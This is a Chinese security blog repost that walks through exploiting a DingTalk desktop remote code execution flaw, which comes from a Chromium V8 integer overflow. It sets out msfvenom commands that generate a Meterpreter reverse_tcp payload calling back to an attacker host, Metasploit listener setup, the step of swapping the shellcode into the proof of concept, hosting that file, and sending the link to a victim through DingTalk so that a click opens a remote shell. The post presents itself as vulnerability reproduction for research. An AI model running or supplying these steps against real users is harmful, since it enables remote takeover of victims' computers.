钉钉RCE漏洞GetShell

admin 2022年4月7日13:56:52评论1 views字数 989阅读3分17秒阅读模式

一、漏洞描述

钉钉具备获取查看web应用能力,且web站点通过http协议传输。基于payload可知,钉钉漏洞的利用就是通过HTTP协议进行访问构造的payload,从而达成远程RCE获取目标电脑权限。

钉钉下载地址

https://dtapp-pub.dingtalk.com/dingtalk-desktop/win_installer/Release/DingTalk_v6.3.5.11308701.exe

二、漏洞原理

利用了Chromium v8引擎整数溢出漏洞(是V8优化编译器Turbofan在SimplifiedLowering阶段产生的一个整数溢出漏洞),V8是Chromium内核中的JavaScript引擎,负责对JavaScript代码进行解释优化与执行。

三、影响版本

钉钉版本< 6.3.25-Release.2149108

四、复现过程

4.1 环境说明

攻击机

10.0.0.129

KaliLinux

目标机

10.0.0.130

Windows 7

4.2 msf生成shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=端口 -e x86/culprit -f csharpmsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.129 LPORT=8834 -e x86/culprit -f csharp

钉钉RCE漏洞GetShell

4.3 msf开启监听

LHOST为攻击机IP,LPORT为刚才生成木马的端口

use exploit/multi/handlerset LHOST 10.0.0.129set LPORT 8834set payload windows/meterpreter/reverse_tcprun

4.4 将生成的shellcode替换原ShellCode

需要替换的位置为

var shellcode=new Uint8Array()

以后的部分

钉钉RCE漏洞GetShell

4.5 开启Web服务,并上传Poc文件 构造Poc

python -m http.server 端口

钉钉RCE漏洞GetShell

4.6 从钉钉发送Poc给受害者

钉钉RCE漏洞GetShell

4.7 受害者点击即会触发漏洞,在msf监听处上线。

钉钉RCE漏洞GetShell

钉钉RCE漏洞GetShell

原文始发于微信公众号(小白嘿课):【漏洞复现】钉钉RCE漏洞GetShell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月7日13:56:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   钉钉RCE漏洞GetShellhttps://cn-sec.com/archives/884624.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息